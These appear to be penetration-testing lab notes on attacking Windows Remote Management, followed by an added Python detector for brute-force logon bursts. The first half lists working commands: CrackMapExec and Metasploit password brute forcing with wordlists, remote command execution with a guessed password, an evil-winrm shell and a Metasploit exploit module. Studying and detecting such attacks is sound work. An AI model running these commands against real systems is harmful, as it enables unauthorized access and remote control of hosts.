Brute force and Authentication
#Enumeration

#CrackMapExec Brute-force
crackmapexec winrm <ip address> -u <username or file> -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Example:
crackmapexec winrm 10.4.30.175 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
#Execute specific Windows commands
crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "whoami"
crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "systeminfo"
#Metasploit Brute Force
# Brute force WinRM login
search winrm_login
use auxiliary/scanner/winrm/winrm_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
#evil-WinRM Shell
Get a command shell session using the evil-winrm tool
evil-winrm.rb -u username -p 'password' -i <ip address>
Example:
evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.30.175
#Metasploit meterpreter session
An alternative for WinRM is its Metasploit WinRM module
search winrm_script
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.4.30.175
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
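#Detecting this sequence (added example)
Defender-side view of the brute-force-then-login sequence above, as an added example that is not part of the original notes: it flags a burst of failed network logons from one source followed by a success for the same account. It assumes the failures are recorded as Security event 4625 and the success as 4624 with logon type 3; the records, addresses and thresholds below are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like Windows Security log events:
# 4625 = failed logon, 4624 = successful logon, logon type 3 = network logon.
# Assumption: WinRM password guesses show up as type 3 events. Values are made up.
def _ev(ts, event_id, user, src):
    return {"time": datetime.fromisoformat(ts), "id": event_id,
            "user": user.lower(), "src": src, "logon_type": 3}

SAMPLE_EVENTS = (
    [_ev(f"2024-01-01T10:00:{s:02d}", 4625, "administrator", "192.0.2.10")
     for s in range(0, 40, 2)]                      # 20 failures in 40 seconds
    + [_ev("2024-01-01T10:00:41", 4624, "Administrator", "192.0.2.10"),
       _ev("2024-01-01T10:05:00", 4625, "alice", "192.0.2.20"),   # one typo
       _ev("2024-01-01T10:05:30", 4624, "alice", "192.0.2.20")]
)

def detect_bruteforce(events, threshold=10, window=timedelta(minutes=5)):
    """Return one finding per (source, user) pair that reached `threshold`
    failed network logons inside `window`; mark it compromised if a
    successful logon for the same pair follows the burst within `window`."""
    failures = defaultdict(list)   # (src, user) -> failure times still in window
    findings = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != 3:
            continue
        key = (ev["src"], ev["user"])
        if ev["id"] == 4625:
            recent = [t for t in failures[key] if ev["time"] - t <= window]
            recent.append(ev["time"])
            failures[key] = recent
            if len(recent) >= threshold:
                f = findings.setdefault(key, {"src": key[0], "user": key[1],
                                              "failures": 0, "compromised": False})
                f["failures"] = max(f["failures"], len(recent))
        elif ev["id"] == 4624 and key in findings:
            # Success shortly after a failure burst: a guess probably worked.
            if ev["time"] - failures[key][-1] <= window:
                findings[key]["compromised"] = True
    return list(findings.values())

if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_EVENTS):
        print(finding)
```

A finding with compromised set is the one to triage first: reset the account's password and review what the session ran.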